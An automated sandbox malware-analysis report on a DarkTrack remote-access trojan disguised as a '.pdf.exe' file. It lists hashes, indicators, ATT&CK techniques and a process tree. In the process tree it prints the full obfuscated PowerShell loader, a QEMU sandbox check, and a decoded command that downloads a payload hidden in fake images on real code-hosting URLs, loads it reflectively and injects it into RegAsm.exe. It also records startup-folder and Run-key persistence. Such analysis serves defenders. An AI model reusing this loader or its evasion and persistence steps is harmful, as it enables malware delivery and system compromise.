darktrack | 1dd25d87c7d8bb002831ed549eb0f077bc1f22e4a61f6d383d17badf92a9e37b

General

Target

.pdf.exe
Size

156KB
MD5

d0fe6894bc2a79ff92e81047d9eef20e
SHA1

62128c6b15c198f93bb11af238a3be35302b066e
SHA256

1dd25d87c7d8bb002831ed549eb0f077bc1f22e4a61f6d383d17badf92a9e37b
SHA512

271177b2188e014052baade253bd1d7141da51a66ad4d2ae1dfb60edf30ffdd813a26b0fe9c627a3500497006ed366ef64f979ce1eab7c2fb9d08ccdbed71c28
SSDEEP

3072:IXK9qKo9bH1ruuXKpgKVObD+HQGJ4peVGHPJn8ugJDjsUQUach7tyur1nPt:IXFKo5cpgDD+lWpxHP5ZgJj6chh

Score

10^/10

darktrack discovery execution persistence rat stealer

Malware Config

Signatures

DarkTrack
DarkTrack is a remote administration tool written in delphi.
rat stealer darktrack

DarkTrack payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4164-29-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack
behavioral2/memory/4164-32-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack
behavioral2/memory/4164-34-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack
behavioral2/memory/4164-39-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack
behavioral2/memory/4164-35-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack
behavioral2/memory/4164-40-0x0000000000400000-0x00000000004A4000-memory.dmp	family_darktrack

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

11 1532 powershell.exe
26 1532 powershell.exe
28 1532 powershell.exe
Drops startup file 1 IoCs

Processes:

.pdf.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jeny.lnk .pdf.exe
Executes dropped EXE 1 IoCs

Processes:

Jeny.exe

pid process

3696 Jeny.exe

flow	pid	process
11	1532	powershell.exe
26	1532	powershell.exe
28	1532	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jeny.lnk	.pdf.exe

pid	process
3696	Jeny.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Jeny.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Jeny.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4440 powershell.exe
1532 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

10 raw.githubusercontent.com
11 raw.githubusercontent.com
25 bitbucket.org
26 bitbucket.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1532 set thread context of 4164 1532 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4440	powershell.exe
1532	powershell.exe

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
25	bitbucket.org
26	bitbucket.org

description	pid	process	target process
PID 1532 set thread context of 4164	1532	powershell.exe	RegAsm.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

.pdf.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4440 powershell.exe
4440 powershell.exe
1532 powershell.exe
1532 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

RegAsm.exe

pid process

4164 RegAsm.exe

pid	process
4440	powershell.exe
4440	powershell.exe
1532	powershell.exe
1532	powershell.exe

pid	process
4164	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

WMIC.exepowershell.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	332	WMIC.exe
Token: SeSecurityPrivilege	332	WMIC.exe
Token: SeTakeOwnershipPrivilege	332	WMIC.exe
Token: SeLoadDriverPrivilege	332	WMIC.exe
Token: SeSystemProfilePrivilege	332	WMIC.exe
Token: SeSystemtimePrivilege	332	WMIC.exe
Token: SeProfSingleProcessPrivilege	332	WMIC.exe
Token: SeIncBasePriorityPrivilege	332	WMIC.exe
Token: SeCreatePagefilePrivilege	332	WMIC.exe
Token: SeBackupPrivilege	332	WMIC.exe
Token: SeRestorePrivilege	332	WMIC.exe
Token: SeShutdownPrivilege	332	WMIC.exe
Token: SeDebugPrivilege	332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	332	WMIC.exe
Token: SeRemoteShutdownPrivilege	332	WMIC.exe
Token: SeUndockPrivilege	332	WMIC.exe
Token: SeManageVolumePrivilege	332	WMIC.exe
Token: 33	332	WMIC.exe
Token: 34	332	WMIC.exe
Token: 35	332	WMIC.exe
Token: 36	332	WMIC.exe
Token: SeIncreaseQuotaPrivilege	332	WMIC.exe
Token: SeSecurityPrivilege	332	WMIC.exe
Token: SeTakeOwnershipPrivilege	332	WMIC.exe
Token: SeLoadDriverPrivilege	332	WMIC.exe
Token: SeSystemProfilePrivilege	332	WMIC.exe
Token: SeSystemtimePrivilege	332	WMIC.exe
Token: SeProfSingleProcessPrivilege	332	WMIC.exe
Token: SeIncBasePriorityPrivilege	332	WMIC.exe
Token: SeCreatePagefilePrivilege	332	WMIC.exe
Token: SeBackupPrivilege	332	WMIC.exe
Token: SeRestorePrivilege	332	WMIC.exe
Token: SeShutdownPrivilege	332	WMIC.exe
Token: SeDebugPrivilege	332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	332	WMIC.exe
Token: SeRemoteShutdownPrivilege	332	WMIC.exe
Token: SeUndockPrivilege	332	WMIC.exe
Token: SeManageVolumePrivilege	332	WMIC.exe
Token: 33	332	WMIC.exe
Token: 34	332	WMIC.exe
Token: 35	332	WMIC.exe
Token: 36	332	WMIC.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

.pdf.exeJeny.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2908 wrote to memory of 3696	2908	.pdf.exe	Jeny.exe
PID 2908 wrote to memory of 3696	2908	.pdf.exe	Jeny.exe
PID 3696 wrote to memory of 3724	3696	Jeny.exe	cmd.exe
PID 3696 wrote to memory of 3724	3696	Jeny.exe	cmd.exe
PID 3724 wrote to memory of 332	3724	cmd.exe	WMIC.exe
PID 3724 wrote to memory of 332	3724	cmd.exe	WMIC.exe
PID 3724 wrote to memory of 4024	3724	cmd.exe	find.exe
PID 3724 wrote to memory of 4024	3724	cmd.exe	find.exe
PID 3724 wrote to memory of 4440	3724	cmd.exe	powershell.exe
PID 3724 wrote to memory of 4440	3724	cmd.exe	powershell.exe
PID 4440 wrote to memory of 1532	4440	powershell.exe	powershell.exe
PID 4440 wrote to memory of 1532	4440	powershell.exe	powershell.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe
PID 1532 wrote to memory of 4164	1532	powershell.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\.pdf.exe"
1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Users\Admin\AppData\Roaming\Jeny.exe
  C:\Users\Admin\AppData\Roaming\Jeny.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c serv.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:332
  - - C:\Windows\system32\find.exe
      find "QEMU"
      4⤵
      PID:4024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#UwBG#GQ#YQBB#EE#a##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#Z#By#GU#Lw#0#DQ#MwBk#GY#cg#v#Gc#cgBv#C4#d#Bl#Gs#YwB1#GI#d#Bp#GI#Lw#v#Do#cwBw#HQ#d#Bo#Cc#L##g#Cc#M##n#Cw#I##n#FM#d#Bh#HI#d#B1#H##TgBh#G0#ZQ#n#Cw#I##n#FI#ZQBn#EE#cwBt#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SFdaAAh/sdaolnwod/dre/443dfr/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1532
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
906a96ab3d13d754809f312628f6e4ac

SHA1
4f1f3d49c788e5736c31904eaf4683ea4e8683c6

SHA256
69f03040bf4208bbfc3617a35799ad9897c2235df7832dc7687c8b91ef2f99e8

SHA512
a0f5fad77325a869edb9a80beb4f2604c5f6d5af652f21a2283e366cd32d42f6fb2f4761d596c6a77a2d83fda4ab52d9a645aedbce5295223c0e30faf306a851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\serv.bat

Filesize
13KB

MD5
481e59b906309ee85321bdbc3381da65

SHA1
7ea909c283562f8c8a8c14ec27bcd6f81ba272fc

SHA256
3232c61baa83423f50c5850713b1ee87ce197eed3ff3e3a1502b75866e4a0a6b

SHA512
415e41ac186fd443703636140a0a38259d368a166b6f5092bf4b1b107d039dc6e812580994d474d4e6ee3d423f28f9895252cfa1346a8f7b2bccdb23c3bdc05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztwsuoes.uyx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Jeny.exe

Filesize
176KB

MD5
713593357178076d7aa7ddb4fab30bc9

SHA1
99c91cd8248dd178245d2153d8560f2bdd7a40f0

SHA256
ccf4db73bd2e8a612b25c05869159d3375b1230e27194175d6e5e6f576fb7d33

SHA512
349326240446ebff9a2ed89c1bafc14eb4018b875aa16184c2ed1f0f381b048d53d18f890549ddc6fbfc2fbf34b3f72f44dbe085e46a0b00e3734ec725f078f9

Download Submit
memory/1532-28-0x0000020E7A170000-0x0000020E7A1AE000-memory.dmp

Filesize
248KB

Download
memory/4164-29-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4164-32-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4164-34-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4164-39-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4164-35-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4164-40-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/4440-14-0x00000280F7490000-0x00000280F74B2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads